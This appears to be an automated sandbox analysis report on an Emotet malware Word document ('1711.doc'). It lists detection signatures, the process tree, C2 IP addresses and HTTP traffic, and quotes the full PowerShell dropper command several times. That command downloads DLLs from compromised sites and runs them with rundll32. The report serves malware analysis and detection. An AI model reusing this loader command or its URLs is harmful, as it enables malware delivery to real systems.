Loading ...

Play interactive tourEdit tour

Windows Analysis Report 1711.doc

Overview

General Information

Sample Name:1711.doc
Analysis ID:526179
MD5:85ab297345c97bca1a5004dc537f6c1c
SHA1:0b609d0b86f1b29410451306c173c7fac013d5a7
SHA256:31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document contains an embedded VBA macro which may execute processes
Sigma detected: Microsoft Office Product Spawning Windows Shell
Changes security center settings (notifications, updates, antivirus, firewall)
Suspicious powershell command line found
Obfuscated command line found
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Document has an unknown application name
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Document contains no OLE stream with summary information
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 4228 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • cmd.exe (PID: 6324 cmdline: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6468 cmdline: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • rundll32.exe (PID: 4896 cmdline: "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 3728 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
            • rundll32.exe (PID: 7060 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
              • rundll32.exe (PID: 2968 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 6368 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6632 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6780 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6876 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6940 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6960 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 1700 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3900 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2264 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\~DFE2F261E3909AA4D4.TMPSUSP_VBA_FileSystem_AccessDetects suspicious VBA that writes to disk and is activated on document openFlorian Roth
  • 0x93e4:$s1: \Common Files\Microsoft Shared\
  • 0x973e:$s1: \Common Files\Microsoft Shared\
  • 0x3d3c:$s2: Scripting.FileSystemObject
  • 0x5083:$a1: Document_Open
  • 0x88d1:$a1: Document_Open
  • 0x9dbb:$a1: Document_Open
  • 0xb436:$a1: Document_Open

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          21.2.rundll32.exe.30146b8.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            21.2.rundll32.exe.30146b8.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Emotet RunDLL32 Process CreationShow sources
              Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7060, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL, ProcessId: 2968
              Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 4228, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 6324
              Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
              Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 4228, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ProcessId: 6324
              Sigma detected: Non Interactive PowerShellShow sources
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6324, ProcessCommandLine: powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs
              Sigma detected: T1086 PowerShell ExecutionShow sources
              Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132820812780374999.6468.DefaultAppDomain.powershell

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for URL or domainShow sources
              Source: https://staviancjs.com/wp-forum/QOm4n2/Avira URL Cloud: Label: malware
              Source: http://itomsystem.in/i9eg3y/nNxmmn9aTcv/.SplitAvira URL Cloud: Label: malware
              Source: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/Avira URL Cloud: Label: malware
              Found malware configurationShow sources
              Source: 21.2.rundll32.exe.30146b8.1.raw.unpackMalware Configuration Extractor: Emotet {"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}
              Multi AV Scanner detection for submitted fileShow sources
              Source: 1711.docVirustotal: Detection: 39%Perma Link
              Source: 1711.docMetadefender: Detection: 20%Perma Link
              Source: 1711.docReversingLabs: Detection: 57%
              Multi AV Scanner detection for domain / URLShow sources
              Source: alfaofarms.comVirustotal: Detection: 7%Perma Link
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\ProgramData\13791789.dllMetadefender: Detection: 34%Perma Link
              Source: C:\ProgramData\13791789.dllReversingLabs: Detection: 81%
              Source: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)Metadefender: Detection: 34%Perma Link
              Source: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)ReversingLabs: Detection: 81%
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
              Source: unknownHTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.5:49794 version: TLS 1.2
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_615CD1EE FindFirstFileExA,

              Software Vulnerabilities:

              barindex
              Document exploit detected (process start blacklist hit)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
              Source: global trafficTCP traffic: 192.168.2.5:49752 -> 72.167.40.83:80
              Source: global trafficDNS query: name: thepilatesstudionj.com
              Source: global trafficTCP traffic: 192.168.2.5:49794 -> 51.178.61.60:443
              Source: winword.exeMemory has grown: Private usage: 0MB later: 76MB

              Networking:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.79.33.48 144
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 168.197.250.14 80
              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.178.61.60 187
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorIPs: 51.178.61.60:443
              Source: Malware configuration extractorIPs: 168.197.250.14:80
              Source: Malware configuration extractorIPs: 45.79.33.48:8080
              Source: Malware configuration extractorIPs: 196.44.98.190:8080
              Source: Malware configuration extractorIPs: 177.72.80.14:7080
              Source: Malware configuration extractorIPs: 51.210.242.234:8080
              Source: Malware configuration extractorIPs: 185.148.169.10:8080
              Source: Malware configuration extractorIPs: 142.4.219.173:8080
              Source: Malware configuration extractorIPs: 78.47.204.80:443
              Source: Malware configuration extractorIPs: 78.46.73.125:443
              Source: Malware configuration extractorIPs: 37.44.244.177:8080
              Source: Malware configuration extractorIPs: 37.59.209.141:8080
              Source: Malware configuration extractorIPs: 191.252.103.16:80
              Source: Malware configuration extractorIPs: 54.38.242.185:443
              Source: Malware configuration extractorIPs: 85.214.67.203:8080
              Source: Malware configuration extractorIPs: 54.37.228.122:443
              Source: Malware configuration extractorIPs: 207.148.81.119:8080
              Source: Malware configuration extractorIPs: 195.77.239.39:8080
              Source: Malware configuration extractorIPs: 66.42.57.149:443
              Source: Malware configuration extractorIPs: 195.154.146.35:443
              Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
              Source: global trafficHTTP traffic detected: GET /xlgRAUoKyrAaNnNNtTN HTTP/1.1Cookie: ZY=3bqR+TDsaw4ISdWheUyZ7+BfZlZm+32bzB+7wtiUWoH9C2gCIryiUl5WAuzJJ5ea6QzyqPEJC6DkwnmwNMb1gk+5A5+cWtbxEcALOy2S4QOQeBpgllr+1+8qRlVVSCJHihVyjR1uqZYCjlCPhmlt/vgDWvzkZJKX+QeR1swdnldI9zpydTmZKXkHoCqWfX3Fqy4OkZd9TUhFwIMLga3/5XfS1ABqmPK7bE/sm3JzQyUjLj4a0GGjw2XmDsZNEYJSFzVD0W/PKResRLsLDUuiRrmZhCw7olwx4jd6UWHq9IxVQWqR2IuMHo90DW/gDju7JXcqzlJaEv0=Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: thepilatesstudionj.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xcyav/F9le301G89W0s2g4jLO5/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: alfaofarms.comConnection: Keep-Alive
              Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
              Source: Joe Sandbox ViewASN Name: EcobandGH EcobandGH
              Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
              Source: Joe Sandbox ViewIP Address: 196.44.98.190 196.44.98.190
              Source: global trafficTCP traffic: 192.168.2.5:49796 -> 45.79.33.48:8080
              Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.drString found in binary or memory: http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/
              Source: PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.drString found in binary or memory: http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/
              Source: powershell.exe, 00000005.00000002.339928145.0000000004958000.00000004.00000001.sdmpString found in binary or memory: http://alfaofarms.com4
              Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000003.511663984.0000000003096000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: powershell.exe, 00000005.00000003.309254161.0000000007861000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
              Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
              Source: powershell.exe, 00000005.00000003.306337007.0000000007819000.00000004.00000001.sdmpString found in binary or memory: http://crl.verisign.
